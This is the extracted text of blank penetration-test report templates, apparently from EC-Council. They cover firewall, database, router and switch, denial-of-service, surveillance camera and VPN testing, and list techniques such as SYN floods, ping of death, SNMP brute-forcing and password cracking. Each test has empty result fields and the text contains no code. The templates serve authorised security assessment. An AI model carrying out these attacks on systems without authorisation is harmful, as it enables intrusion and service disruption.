Port Number
2.
3.
4.
5.
Results Analysis:

Test 22: Try to bypass the firewall using source routing
Target Organization
URL
Address Information Modified Address Information
2.
3.
4.
5.
Results Analysis:

Test 23: Test HTTP tunneling method
Target Organization
URL
Company has a public web server with port 80 used for Yes No
HTTP traffic
Firewall examines the payload of an HTTP packet Yes No
2.
3.
4.
5.
Results Analysis:

Test 24: Test ICMP tunneling method
Target Organization
URL
ICMP Tunneling
Technique Results
2.
3.
4.
5.
Results Analysis:

Test 25: Test ACK tunneling method
Target Organization
URL
ACK Tunneling
Technique Results
2.
3.
4.
5.
Results Analysis:

Test 26: Test SSH tunneling method
Target Organization
URL
SSH Tunneling
Technique Results
2.
3.
4.
5.
Results Analysis:

Test 27: Try to bypass firewall through MITM attack
Target Organization
URL
DNS server
2.
3.
4.
5.
Results Analysis:

Test 28: Try to bypass firewall using malicious contents
Target Organization
URL
Malicious Content
Used against Firewall
2.
3.
4.
5.
Results Analysis:

Test 29: Test firewall-specific vulnerabilities
Target Organization
URL
List Product Specific 1.
Exploits against Firewall 2.
Vulnerabilities
3.
4.
5.
Response Received from

Implementation of
Product Specific Exploits
against Firewall
Vulnerabilities
2.
3.
4.
5.
Results Analysis:

Tester
Methodology: Database Penetration Testing
Penetration Tester:
Organization:
Date: Location:
Confidential 1 Template DPT/12

Test 1: Perform database port scanning
Target Organization
URL
Port Database uses
Is the Port open? Yes No
2.
3.
4.
5.
Results Analysis:
Confidential 2 Template DPT/12 Copyright by EC-Council

Test 2: Sniff database-related traffic on the local wire
Target Organization
URL
Target IP Addresses 1.
2.
3.
4.
5.
Data Packets related 1.

to Database 2.
3.
4.
5.
Number of Database
Connections
2.
3.
4.
5.
Results Analysis:

Test 3: Test for weak passwords, default accounts on databases
Target Organization
URL
Databases Present 1.
on the Network 2.
3.
4.
5.
Does the Database have Latest Patches applied? Yes No

Weak Passwords 1.
2.
3.
4.
5.
Default accounts 1.
2.
3.
4.
5.
Other threats 1.
2.
3.
4.
5.
6.
7.
8.

2.
3.
4.
5.
Results Analysis:

Test 4: Perform Google hacking for database errors
Target Organization
URL
Database errors 1.
2.
3.
4.
5.
Databases 1.
Connected to the 2.
Network
3.
4.
5.
Database 1.
Vulnerabilities 2.
3.
4.
5.
2.
3.
4.
5.

Results Analysis:

Test 5: Exploit web applications to retrieve information about Oracle databases running at
the backend
Target Organization
URL
Retrieved Database 1.
Information via Error 2.
Messages in
Vulnerable Web 3.
Applications 4.
5.
Oracle database
version used at the
backend
List of all Usernames 1.
in Oracle(11g) 2.
Database
3.
4.
5.
List of all User Tables 1.

and the number of 2.
rows in Oracle(11g)
Database 3.
4.
5.
2.
3.
4.
5.

Results Analysis:

Test 6: Identify the version numbers used by the database
Target Organization
URL
Version Information
of the Oracle
Database
2.
3.
4.
5.
Results Analysis:

Test 7: Determine Oracle version using Metasploit
Target Organization
URL
Determined Oracle
Version
2.
3.
4.
5.
Results Analysis:

Test 8: Identify the password management in Oracle
Target Organization
URL
Number of Weak
Passwords
List of Accounts 1.
having Weak 2.
Passwords
3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 9: Identify the execution of public privileges on Oracle
Target Organization
URL
Identified Execution 1.
of Public Privileges 2.
on Oracle
3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 10: Identify privilege escalation via cursor technique in Oracle
Target Organization
URL
Identified Privilege 1.
Escalation Using 2.
Cursor Technique in
Oracle Database 3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 11: Identify public privileges from object types
Target Organization
URL
Identified Public 1.
Privileges from 2.
Object Types
3.
Transferred Data Out 1.

of the Database 2.
Using SQL Injection
Attacks 3.
4.
Oracle Audited 1.
Entries 2.
3.
4.
5.
SQL Statement 1.
Submitted by the 2.
Database
3.
4.
5.
Information 1.
Gathered from 2.
Audited Tables
3.
4.
5.

Attacks that can 1.

Bypass the 2.
Protections Provided
by the Oracle 3.
Database Vault 4.
5.
2.
3.
4.
5.
Results Analysis:

Test 12: Identify Oracle Java vulnerabilities in SQL injection
Target Organization
URL
Identified Oracle 1.
Java Vulnerabilities 2.
in SQL Injection
3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 13: Determine Oracle service ID (SID) using Metasploit
Target Organization
URL
Techniques Used to 1.
Determine the 2.
Service ID
3.
Determined Oracle 1.
Service ID (SID) Using 2.
Metasploit
3.
2.
3.
4.
5.
Results Analysis:

Test 14: Identify attack into database target DB by using a simulated user
Target Organization
URL
Script to Detect Flaws
of the
DBMS_METADATA.GE
T_DDL Function in
Oracle
Identified Attack into
Database Target DB
by Using a Simulated
User
2.
3.
4.
5.
Results Analysis:

Test 15: Scan for other default ports used by the Oracle database
Target Organization
URL
Default Ports Used 1. 21.
by the Oracle 2. 22.
Database
3. 23.
4. 24.
5. 25.
6. 26.
7. 27.
8. 28.
9. 29.
10. 30.
11. 31.
12. 32.
13. 33.
14. 34.
15. 35.
16. 36.
17. 37.
18. 38.
19. 39.
20. 40.
List of Open Ports 1.

Discovered on 2.
a Computer/Server
3.
4.
5.

2.
3.
4.
5.
Results Analysis:

Test 16: Scan for non-default ports used by the Oracle database
Target Organization
URL
List of Non-Default 1. 11.
Ports Used by the 2. 12.
Oracle Database
3. 13.
4. 14.
5. 15.
6. 16.
7. 17.
8. 18.
9. 19.
10. 20.
2.
3.
4.
5.
Results Analysis:

Test 17: Identify the instance names used by the Oracle database
Target Organization
URL
Unique Names 1.
Specified While 2.
Configuring an
Instance of the 3.
Notification Services
Identified Instance 1.
Database Objects 2.
3.
4.
Instance Name 1.
Criteria 2.
3.
4.
2.
3.
4.
5.
Results Analysis:

Test 18: Attempt to brute-force password hashes from the Oracle database
Target Organization
URL
Passwords Identified
from the Database
Using Brute-Force
Password Hashes
Location of Oracle 1.
Password Hashes 2.
3.
4.
2.
3.
4.
5.
Results Analysis:

Test 19: Check the status of the TNS Listener running at Oracle server
Target Organization
URL
Status of the TNS
Listener Running at
Oracle Server
SID Retrieved for
Unprotected Listener
Files that Control the 1.
Listener 2.
3.
4.
5.
Mode Used to Configure a Listener

Database PLSExtProc Executable
2.
3.
4.
5.

Results Analysis:

Test 20: Try to log in using default account passwords
Target Organization
URL
Attempted Log in Using Default Account Passwords
Account Password
1. 1.
2. 2.
3. 3.
4. 4.
5. 5.
6. 6.
Attempted Login Successful YES NO
2.
3.
4.
5.
Results Analysis:

Test 21: Try to enumerate SIDs
Target Organization
URL
Default User Names and Passwords after SID Enumeration
User Names Passwords
1. 1.
2. 2.
3. 3.
4. 4.
5. 5.
2.
3.
4.
5.
Results Analysis:

Test 22: Use SQL *Plus to enumerate system tables
Target Organization
URL
Command Used to
Establish a
Connection to a
Remote User
2.
3.
4.
5.
Results Analysis:

Test 23: Extract SQL server database information
Target Organization
URL
SQL server database
information
2.
3.
4.
5.
Results Analysis:

Test 24: Test for direct access interrogation
Target Organization
URL
Directly Accessed
Data Structures
Special Queries Used
to Directly
Interrogate the
Database
2.
3.
4.
5.
Results Analysis:

Test 25: Test for SQL Server Resolution Service (SSRS)
Target Organization
URL
Referral Services
Provided for
Multiple Server
Instances Running on
the Same Machine
UDP port 1434 Scan
Results for SQL
Server Resolution
Service
Hidden Database 1.
Instances 2.
3.
2.
3.
4.
5.
Results Analysis:

Test 26: Test for buffer overflow in the pwdencrypt() function
Target Organization
URL
Unchecked Buffer in
the Password
Encryption
Procedure
Identified Incorrect
Permission on the
SQL Server Service
Account Registry Key
2.
3.
4.
5.
Results Analysis:

Test 27: Test for heap/stack buffer overflow in SSRS
Target Organization
URL
Scan Results for the 1.
UDP port 1434 at the 2.
firewall
3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 28: Test for buffer overflows in the extended stored procedures
Target Organization
URL
List the Extended
Stored Procedures
that Cause Stack
Buffer Overflow
Publicly Accessible
Database Queries
Loaded and Executed
Database Query that
Calls One of the
Affected Functions
2.
3.
4.
5.
Results Analysis:

Test 29: Test for service account registry key
Target Organization
URL
Test Results for the 1.
Altered SQL Service 2.
Account Registry Key
3.
4.
5.
Escalated Privileges
that Weaken the
Security Policy of
SQL Server
2.
3.
4.
5.
Results Analysis:

Test 30: Test the stored procedure to run web tasks
Target Organization
URL
Test Results for the 1.
Stored Procedure to 2.
Run Web Tasks
3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 31: Attempt direct-exploit attacks
Target Organization
URL
Code Injection 1.
Performed to Gain 2.
Unauthorized
Command Line 3.
Access 4.
5.
2.
3.
4.
5.
Results Analysis:

Test 32: Retrieve all login accounts using T-SQL query
Target Organization
URL
List of Login 1.
Accounts on MS SQL 2.
Server Database
3.
4.
5.
SQL Login Accounts 1.

2.
3.
4.
5.
Windows Login 1.
Accounts 2.
3.
4.
5.
Windows Group 1.
Login Accounts 2.
3.
4.
5.
2.
3.

4.
5.
Results Analysis:

Test 33: Brute-force the SA account
Target Organization
URL
Retrieved Password
by Brute-forcing SA
Account
2.
3.
4.
5.
Results Analysis:

Test 34: Extract the version of the MySQL server database being used
Target Organization
URL
Extracted Version of
the MySQL server
Database Being Used
2.
3.
4.
5.
Results Analysis:

Test 35: Try to log in using default/common passwords
Target Organization
URL
Attempted Login Using Default/ Common Passwords
User Names Passwords
1. 1.
2. 2.
3. 3.
4. 4.
5. 5.
2.
3.
4.
5.
Results Analysis:

Test 36: Brute-force accounts using dictionary attack
Target Organization
URL
Brute-forced
Accounts Using
Dictionary Attack
Methods Used to Brute-Force Accounts
Manually Making Use of Software and Database
2.
3.
4.
5.
Results Analysis:

Test 37: Extract system and user tables from the database
Target Organization
URL
Extracted System and User Table Information from the Database
System Information User Table Information
2.
3.
4.
5.
Results Analysis:

Tester
Methodology: Router and Switches Penetration Testing
Penetration Tester:
Organization:
Date: Location:
Confidential 1 Template RSPT/18

Router Penetration Testing
Test 1: Identify the router hostname
Target Organization
URL
IP address of the
router
Hostname of the
router
2.
3.
4.
5.
Results Analysis:
Confidential 2 Template RSPT/18 Copyright by EC-Council

Test 2: Port scan the router
Target Organization
URL
Open Ports
7 Echo 113 IDENT
13 DayTime 115 Simple File Transfer Protocol (SFTP)
17 Quote of the Day (QOTD) 137 NetBIOS
20 File Transfer Protocol (FTP) 138 NetBIOS
21 File Transfer Protocol (FTP) 139 NetBIOS
22 Secure Socket Shell (SSH) 143 Internet Message Access Protocol
(IMAP)
23 Telnet 161 Simple Network Management Protocol
25 SMTP 162 Simple Network Management Protocol
53 Domain Name System (DNS) 194 Internet Relay Chat (IRC)
63 Whois 443 HTTPS
66 SQL*net (Oracle) Other Ports:
70 Gopher
79 Finger
80 HTTP
88 Kerberos
101 Host Name Server
109 Post Office Protocol 2 (POP2)
110 Post Office Protocol 3 (POP3)
2.
3.
4.
5.

Results Analysis:

Test 3: Identify the router operating system and its version
Target Organization
URL
IP address of the
router tested
Operating System
and its version
2.
3.
4.
5.
Results Analysis:

Test 4: Identify protocols running
Target Organization
URL
IP address of the
router tested
Protocols running
RIP OSPF
RIPv2 BGP
IGRP Others
EIGRP
2.
3.
4.
5.
Results Analysis:

Test 5: Testing for package leakage at the router
Target Organization
URL
IP address of the
router tested
Package Leak YES NO
2.
3.
4.
5.
Results Analysis:

Test 6: Test for router misconfigurations
Target Organization
URL
IP address of the
router tested
Is the router
YES NO
misconfigured?
2.
3.
4.
5.
Results Analysis:

Test 7: Test for VTY/TTY connections
Target Organization
URL
IP address of the
router tested
Is console access
possible?Is the
YES NO
router console
accessible?
2.
3.
4.
5.
Results Analysis:

Test 8: Test for router running modes
Target Organization
URL
IP address of the
router tested
Modes USER MODE PRIVILEGE MODE
2.
3.
4.
5.
Results Analysis:

Test 9: Test for SNMP capabilities
Target Organization
URL
IP address of the
router tested
SNMP Strings used
2.
3.
4.
5.
Results Analysis:

Test 10: Perform SNMP bruteforcing
Target Organization
URL
IP address of the
router tested
SNMP community
strings
2.
3.
4.
5.
Results Analysis:

Test 11: Test for TFTP connections
Target Organization
URL
IP address of the
router tested
TFTP Allowed YES NO
2.
3.
4.
5.
Results Analysis:

Test 12: Test if finger is running on the router
Target Organization
URL
IP address of the
router tested
Finger Service
YES NO
running
2.
3.
4.
5.
Results Analysis:

Test 13: Test for CDP protocol running on the router
Target Organization
URL
IP address of the
router tested
CDP Protocol running YES NO
CDP Messages
Device ID (hostname) IOS software version being used
Port ID (port information about the sender) Capabilities of the router
Operating system platform Network IP address
2.
3.
4.
5.
Results Analysis:

Test 14: Test for NTP protocol
Target Organization
URL
IP address of the
router tested
NTP Protocol running YES NO
Router Synchronized YES NO
2.
3.
4.
5.
Results Analysis:

Test 15: Test for access to router console port
Target Organization
URL
IP address of the
router tested
Is Physical console
YES NO
accessible? possible
Console access on
router is password YES NO
protected
2.
3.
4.
5.
Results Analysis:

Test 16: Test for loose and strict source routing
Target Organization
URL
IP address of the
router tested
Routing Loose Source Routing Strict Source Routing
2.
3.
4.
5.
Results Analysis:

Test 17: Test for IP spoofing/IP
Target Organization
URL
IP address of the
router tested
IP Spoofing possible YES NO
2.
3.
4.
5.
Results Analysis:

Test 18: Test for handling bugs
Target Organization
URL
IP address of the
router tested
Test Successful YES NO
ACLs used on the
YES NO
router
2.
3.
4.
5.
Results Analysis:

Test 19: Test ARP attacks
Target Organization
URL
IP address of the
router tested
ARP spoofing is
possible against the YES NO
router
Victim IP address
Victim MAC address
Poisoned IP address
Poisoned MAC
address
2.
3.
4.
5.
Results Analysis:

Test 20: Test for routing protocol assessment
Target Organization
URL
IP address of the
router tested
Weak authentication
YES NO
present
2.
3.
4.
5.
Results Analysis:

Test 21: RIP testing
Target Organization
URL
IP address of the
router tested
RIP v1 Authentication:
RIP v2 Authentication:
2.
3.
4.
5.
Results Analysis:

Test 22: Test for OSPF protocol
Target Organization
URL
IP address of the
router tested
OSPF protocol Authentication:
present
Misconfigured? Authentication:
2.
3.
4.
5.
Results Analysis:

Test 23: Test BGP protocol
Target Organization
URL
IP address of the
router tested
BGP Protocol present YES NO
2.
3.
4.
5.
Results Analysis:

Test 24: Test for EIGRP protocol
Target Organization
URL
IP address of the
router tested
EIGRP Protocol
YES NO
present
2.
3.
4.
5.
Results Analysis:

Test 25: Test router denial-of-service attacks
Target Organization
URL
IP address of the
router tested
Malformed
YES NO
Packet Attack
Packet
YES NO
Flood Attacks
2.
3.
4.
5.
Results Analysis:

Test 26: Test routers HTTP capabilities
Target Organization
URL
IP address of the
router tested
Port Used to Connect
2.
3.
4.
5.
Results Analysis:

Test 27: Test through HSRP attack
Target Organization
URL
IP address of the
router tested
HSRP group
forwarded to IP YES NO
address
2.
3.
4.
5.
Results Analysis:

Switch Penetration Testing
Test 1: Testing address of cache size
Target Organization
URL
Frame size relayed
Address Cache Size
2.
3.
4.
5.
Results Analysis:

Test 2: Data integrity and error checking test
Target Organization
URL
Frame Size
Traffic Rate
Data Pattern
2.
3.
4.
5.
Results Analysis:

Test 3: Testing for back-to-back frame capacity
Target Organization
URL
Number of frames
sent at once
Inter-frame gaps
Number of frames
forwarded by the
switch
Number of tests
rerun
Capacity detected
2.
3.
4.
5.
Results Analysis:

Test 4: Testing for frame loss
Target Organization
URL
Count the frames
that are transmitted
Frame loss equation
Measurement
2.
3.
4.
5.
Results Analysis:

Test 5: Testing for latency
Target Organization
URL
Method used
Latency detected
2.
3.
4.
5.
Results Analysis:

Test 6: Testing for throughput
Target Organization
URL
Count the frames
The rate of the
offered stream
Throughput
2.
3.
4.
5.
Results Analysis:

Test 7: Test for frame error filtering
Target Organization
URL
Frame Size
Illegal frame types
Traffic Rate
2.
3.
4.
5.
Results Analysis:

Test 8: Fully meshed test
Target Organization
URL
Frame Size
Traffic Rate
Traffic Data Type
DUT setup
2.
3.
4.
5.
Results Analysis:

Test 9: Stateless QoS functional test
Target Organization
URL
Frame size
Duration
Traffic Rate
DUT-QoS
DUT-Line speed
DUT-QoS type
DUT-QoS Policies
DUT-Queue type
2.
3.
4.
5.
Results Analysis:

Test 10: Spanning tree network convergence performance test
Target Organization
URL
Test ports
2.
3.
4.
5.
Results Analysis:

Test 11: OSPF performance test
Target Organization
URL
Frame Size
Traffic Rate
OSPF Parameters
DUT setup
DUT OSPF Area
2.
3.
4.
5.
Results Analysis:

Test 12: Test for VLAN hopping
Target Organization
URL
Dynamic Trunking
Protocol
DTP States
DTP Negotiation
VLAN Hopping
2.
3.
4.
5.
Results Analysis:

Test 13: Test for MAC table flooding
Target Organization
URL
Content Addressable
Memory
2.
3.
4.
5.
Results Analysis:

Test 14: Testing for ARP attack
Target Organization
URL
MAC address
IP address
2.
3.
4.
5.
Results Analysis:

Test 15: Check for VTP attack
Target Organization
URL
Command Output
Cat2950#show vtp status
VTP Version
Configuration Revision
Maximum VLANs supported
locally
Number of existing VLANs
VTP Operating Mode
VTP Domain Name
VTP Pruning Mode
VTP V2 Mode
VTP Traps Generation
MD5 digest
Configuration last modified by
2.
3.
4.
5.
Results Analysis:

Test 16: Automated tool for switch
Target Organization
URL
Scanned Status for 1.
Network Devices 2.
3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Tester
Methodology: Denial-of-Service Penetration Testing
Penetration Tester:
Organization:
Date: Location:
Confidential 1 Template DoSPT/19

Test 1: Test heavy loads on the server
Target Organization
URL
Server IP Address
tested
Impact of the test
2.
3.
4.
5.
Results Analysis:
Confidential 2 Template DoSPT/19 Copyright by EC-Council

Test 2: Check for DoS vulnerable systems
Target Organization
URL
Server IP Address
tested
Impact of the test
2.
3.
4.
5.
Results Analysis:

Test 3: Run SYN attack on the server
Target Organization
URL
Server IP Address
tested
Impact of the test
2.
3.
4.
5.
Results Analysis:

Test 4: Run port flooding attacks on the server
Target Organization
URL
Server IP Address
tested
Impact of the Test
2.
3.
4.
5.
Results Analysis:

Test 5: Run IP fragmentation attack on the server
Target Organization
URL
Server IP Address
tested
Impact of the Test
2.
3.
4.
5.
Results Analysis:

Test 6: Run ping of death
Target Organization
URL
Server IP Address
tested
Impact of the test
2.
3.
4.
5.
Results Analysis:

Test 7: Run teardrop attack
Target Organization
URL
Server IP Address
tested
Impact of the test
2.
3.
4.
5.
Results Analysis:

Test 8: Run smurf (ping flooding or ICMP storm) attack
Target Organization
URL
Server IP Address
tested
Impact of the test
2.
3.
4.
5.
Results Analysis:

Test 9: Run email bomber on the email servers
Target Organization
URL
Server IP Address
tested
Impact of the test
2.
3.
4.
5.
Results Analysis:

Test 10: Flood the website forms and guestbook with bogus entries
Target Organization
URL
Server IP Address
tested
Impact of the test
2.
3.
4.
5.
Results Analysis:

Test 11: Run service request floods
Target Organization
URL
Server IP Address
Tested
Service Requests
Containing Large
Payloads
Impact of the Test
2.
3.
4.
5.
Results Analysis:

Test 12: Run permanent DoS attacks
Target Organization
URL
Server IP Address
Tested
Social Engineering
Techniques used to
Post the Fraudulent
Links
Impact of the Test
2.
3.
4.
5.
Results Analysis:

Test 13: Run peer-to-peer attacks
Target Organization
URL
Server IP Address
Tested
Unpatched DC++
(direct connect) Hubs
Non-vulnerable DC++
(direct connect) Hubs
IP Addresses to Block
and Exploit DC++
Hubs
Impact of the Test
2.
3.
4.
5.
Results Analysis:

Test 14: Test for SQL wildcard injection attacks
Target Organization
URL
Server IP Address
Tested
Wildcards used to
exhaust CPU
resources
Query Execution
Time in the Database
Server
Http Log Files for
Response Time of
the Query
2.
3.
4.
5.
Results Analysis:

Test 15: Try to log in to customer accounts
Target Organization
URL
Logging Mechanism
of the Host
Applications
User Account Locked YES NO
Number of Failed
Login Attempts
Access User Database using a BruteForcing Technique YES NO
Logic Behind
MachineGenerated
User Names
2.
3.
4.
5.
Results Analysis:

Test 16: Test for buffer overflow attacks that result in denial of service
Target Organization
URL
Server IP Address
Tested
Overwrite Memory
Fragments
Arbitrary Code
Executed on the
Target Server
Code Executed to
cause Segmentation
Fault
Code Executed to
cause Memory Dump
2.
3.
4.
5.
Results Analysis:

Test 17: Test for DOS user-specified object allocation
Target Organization
URL
Server IP Address
Tested
User-Specified
Number of Objects
Allocated to the
Clients Server
Automated Script to
Exhaust Resources of
E-Commerce Sites
2.
3.
4.
5.
Results Analysis:

Test 18: Test for user input as a loop counter
Target Organization
URL
Applications Loop through a Code Segment that
YES NO
Exhausts Computing Resources
Places Located
where Input Values
Exhaust Server
Resources
2.
3.
4.
5.
Results Analysis:

Test 19: Try to generate large application log files
Target Organization
URL
Server IP Address
Tested
Data Validation
Method Records the
Failed Value
Upper Limit of Log
Dimensions and
Maximum Allocated
Space for each Log
Entry to Perform an
Attack on
Application Logs
Application Log Files Record overly large Requests Sent to
YES NO
the Host Server without any Limitation of the Length
2.
3.
4.
5.
Results Analysis:

Test 20: Test for memory allocation in applications
Target Organization
URL
Server IP Address
Tested
Applications Properly Release Resources after
YES NO
they are used
Special Characters
used to Create Errors
in Applications and
Consume Memory
2.
3.
4.
5.
Results Analysis:

Test 21: Try to store too much data in sessions
Target Organization
URL
Server IP Address
Tested
Target Memory
Usage
Automated Scripts
sent to Create New
Sessions on the
Server
Blocks of Data are Recorded in a Cache YES NO
Blocks of Data are Recorded in Database for User Sessions YES NO
2.
3.
4.
5.
Results Analysis:

Tester
Methodology: Surveillance Camera Penetration Testing
Penetration Tester:
Organization:
Date: Location:
Confidential 1 Template SPT/23

Test 1: Check the type of surveillance equipment used
Target Organization
URL
Type of Surveillance Camera Used in the Organization
Bullet Camera PC-Based Surveillance System
IP Camera All-in-One Camera Systems
Board Cameras Others
Depending on the type of surveillance camera, which of the following is used, and is
required for an organization
Hidden Cameras:
Closed Circuit Television (CCTV) Systems:
Low-Light Surveillance:
Long-Range Surveillance:
2.
3.
4.
5.
Results Analysis:
Confidential 2 Template SPT/23 Copyright by EC-Council

Test 2: Check whether cameras are deployed in critical areas
Target Organization
URL
Surveillance Equipment is Mounted in
YES NO
Critical Areas
Provides Required Area Coverage YES NO
Audio Recording Enabled YES NO
Desired Footage Tone YES NO
2.
3.
4.
5.
Results Analysis:

Test 3: Check the video transmission medium
Target Organization
URL
Video Transmission 1.
Medium for Various 2.
Types of Security
Cameras 3.
4.
5.
Components of the 1.
Surveillance System 2.
used as Effective
Means of Video 3.
Transmission 4.
5.
Connectivity of the Video Recording Signal in Activated Mode YES NO

2.
3.
4.
5.
Results Analysis:

Test 4: Attempt tampering with the wire/wireless connectivity to the cameras
Target Organization
URL
Possibility of Tampering the Wire/Wireless
YES NO
Connectivity to the Cameras
Camera Resolution 1.
and the Range with 2.
Usage of Different
Lenses 3.
Weatherproofing 1.
Measures Taken to 2.
Protect the Wireless
Equipment 3.
2.
3.
4.
5.
Results Analysis:

Test 5: Check the bandwidth available for the surveillance cameras
Target Organization
URL
Amount of
Bandwidth Used by
Network Surveillance
Cameras
Factors on which the 1.
Bandwidth 2.
Requirement of a
Surveillance System 3.
Depends
Dedicated Bandwidth Available for the
YES NO
Surveillance System
2.
3.
4.
5.
Results Analysis:

Test 6: Check the settings of the monitoring computer
Target Organization
URL
Efficiency of the
Security Camera
Monitor
Type of Security Camera Monitor Used
Set-up Camera System or Main Monitor Spot Monitor
2.
3.
4.
5.
Results Analysis:

Test 7: Check video footage clarity
Target Organization
URL
Lighting and
Resolution of the
Footage
Image Quality Meets Minimum Legal And Policy
YES NO
Requirements
Distance Between the Camera Fixed to the Wall or
YES NO
Ceiling is Proportionate to the Clarity of the Image
2.
3.
4.
5.
Results Analysis:

Test 8: Attempt changing video formats
Target Organization
URL
Results of Video
Formats Testing
Commonly Used
Video Formats
Used Security Surveillance Cameras are Supported
YES NO
by Certain Commonly Used Video Formats
2.
3.
4.
5.
Results Analysis:

Test 9: Scan for suspicious device drivers in the monitoring computer
Target Organization
URL
Scan Results for 1.
Devices Used to 2.
Monitor Video
Surveillance Cameras 3.
for Suspicious 4.
Drivers
5.
Noticed Drivers 1.
Interfere with the 2.
Working of DVR
Systems 3.
Device Drivers being Used are Genuine YES NO

2.
3.
4.
5.
Results Analysis:

Test 10: Check the video viewing options
Target Organization
URL
Video Viewing
Options
Controls in the Main 1.
Screen 2.
3.
Things to be Focused 1.
on to Get the Best 2.
Images and Video
Recordings on the 3.
Security Camera 4.
5.
2.
3.
4.
5.
Results Analysis:

Test 11: Identify the possible threats while integrating video with other systems
Target Organization
URL
Identified Possible Threats while Integrating Video with Other Systems
Hardware Threats:
Electrical Threats:
Environmental Threats:
Maintenance Threats:
2.
3.
4.
5.
Results Analysis:

Test 12: Check if the footage storage duration meets the organizations requirements
Target Organization
URL
Organization making Valid Usage of Information
YES NO
Obtained from Surveillance Camera Footage
Factors that 1.
Determine Whether 2.
to Store Bulky Data
or Video Footage 3.
Straight to the Hard 4.
Disks
5.
Analysis of the Type 4.

of Video Storage 5.
Used
6.
7.
8.
2.
3.
4.
5.
Results Analysis:

Test 13: Check the optimization of DVR/NVR storage
Target Organization
URL
Features Included in Video Management System to Store Optimized Data for Security
1. 6.
2. 7.
3. 8.
4. 9.
5. 10.
2.
3.
4.
5.
Results Analysis:

Test 14: Check network settings of the DVR/NVR system
Target Organization
URL
Basics Steps to Check 1.
the Configuration of 2.
the DVR Network
and a Computer with 3.
Remote Viewer 4.
software
5.
2.
3.
4.
5.
Results Analysis:

Test 15: Check if all connections are working properly
Target Organization
URL
Devices Checked 1.
2.
3.
4.
5.
List of the Devices 1.

Not Working 2.
Properly
3.
4.
5.
Results Analysis:

Test 16: Check who has local and remote access to the DVR/NVR
Target Organization
URL
Determined Local
and Remote Access
to DVR/NVR Systems
through Surveillance
Policy
Analysis of DVR/NVR
Access Logs
Detected
Unauthorized
Attempt to Access
DVR/NVR Systems
2.
3.
4.
5.
Results Analysis:

Test 17: Scan the organizations network range to detect DVR systems
Target Organization
URL
Detected DVR
Systems
Scan Results of the
Organizations
Network Range
2.
3.
4.
5.
Results Analysis:

Test 18: Check if access to the DVR/NVR is protected
Target Organization
URL
Access to the DVR System is Protected YES NO
Type of Access Control Mechanisms Used
Physical Security System Access
Strong Password Used for Administration True False

2.
3.
4.
5.
Results Analysis:

Test 19: Try cracking DVR/NVR access passwords
Target Organization
URL
Target IP Address
Protocol Used
Attempt to Crack the
DVR/NVR Access
Password
2.
3.
4.
5.
Results Analysis:

Tester
Methodology: VPN Penetration Testing
Penetration Tester:
Organization:
Date: Location:
Confidential 1 Template VPNPT/25

Test 1: Check the target organizations VPN security policy
Target Organization
URL
VPN Security Policy Enforced YES NO
2.
3.
4.
5.
Results Analysis:
Confidential 2 Template VPNPT/25 Copyright by EC-Council

Test 2.1: Scanning - 500 UDP IPsec
Target Organization
URL
Target URL
State of the UDP Port 500 Open Closed
ISAKMP Service (IPSec VPN Server) is
Yes No
Running on Port 500
2.
3.
4.
5.
Results Analysis:

Test 2.2: Scanning - 1723 TCP PPTP
Target Organization
URL
Target URL
State of the TCP Port 1723 Open Closed
PPTP Service is Running on Port 1723 Yes No
2.
3.
4.
5.
Results Analysis:

Test 2.3: Scanning - 443 TCP/SSL
Target Organization
URL
Target URL
State of the TCP Port 443 Open Closed
7.
8.
9.
10.
Results Analysis:

Test 2.4: Scanning - Ipsecscan xxx.xxx.xxx.xxx-255
Target Organization
URL
Single IP Address
Scan
Range of IP
Addresses Scanned
IPSEC Enabled
Systems
2.
3.
4.
5.
Results Analysis:

Test 3: Fingerprinting
Target Organization
URL
VPN Vulnerabilities 1.
Detected 2.
3.
Information 1.
Gathered through 2.
Fingerprinting
3.
2.
3.
4.
5.
Results Analysis:

Test 3.1: Get the IKE handshake
Target Organization
URL
Host URL
Acceptable 1.
Transform Attributes 2.
from the Security
Association (SA) 3.
Payload
Combination of 1.
Transfer Attributes 2.
Tried
3.
2.
3.
4.
5.
Results Analysis:

Test 3.2: UDP Backoff fingerprinting
Target Organization
URL
Host URL
Implementation 1.
Guess 2.
3.
Information 1.
Gathered 2.
3.
2.
3.
4.
5.
Results Analysis:

Test 3.3: Vendor ID fingerprinting
Target Organization
URL
Vendor ID Payload 1.
2.
3.
Gathered 2.
3.
2.
3.
4.
5.
Results Analysis:

Test 3.4: Check for IKE aggressive mode
Target Organization
URL
Host URL
Aggressive Mode Enabled YES NO
2.
3.
4.
5.
Results Analysis:

Test 4: Test for default user accounts and passwords
Target Organization
URL
IPSEC VPN: Default User Accounts and Passwords
User Accounts Passwords
1. 1.
2. 2.
3. 3.
4. 4.
5. 5.
2.
3.
4.
5.
Results Analysis:

Test 5: Check for unencrypted user name in a file or the registry
Target Organization
URL
Password File or
Registry Entry
Successfully Recovered Passwords YES NO
Recovered 1.
Passwords 2.
3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 6: Test for plain-text password
Target Organization
URL
VPN Client Established to Obtain the Password YES NO
Plain-text Password
Recovered
2.
3.
4.
5.
Results Analysis:

Test 7: Perform user name enumeration
Target Organization
URL
Response Given by 1.
the VPN Endpoint to 2.
an Authentication
Attempt 3.
List of Valid 1.
Usernames 2.
3.
2.
3.
4.
5.
Results Analysis:

Test 8: Check account lockout in VPN
Target Organization
URL
Connection to VPN Tunnel Using Correct User Name and False Password
Threshold defined by the authentication
system for failed login attempts
Amount of time required to reset user
account credentials
Impact of the Test 1.
2.
3.
2.
3.
4.
5.
Results Analysis:

Test 9: Audit VPN traffic
Target Organization
URL
Sniffing Techniques
Used to Intercept
VPN Traffic
Traffic Intercepted
Before it Passes the
Tunnel
Traffic Intercepted
After it Passes the
Tunnel
Decrypt Traffic Off the Line Successful Unsuccessful
Recover Sensitive 1.
Information 2.
3.
4.
5.
2.
3.
4.
5.
Results Analysis:

Test 10: Check for proper firewalling in VPN
Target Organization
URL
Open Ports in the Firewall
1. 4.
2. 5.
3. 6.
Packets Passed 1.
through TCP and 2.
UDP Filtering in the
Firewall 3.
Results from 1.
examined Firewall 2.
Logs
3.
4.
2.
3.
4.
5.
Results Analysis:

Test 11: Check denial-of-services in VPN
Target Organization
URL
Router Effect on the 1.
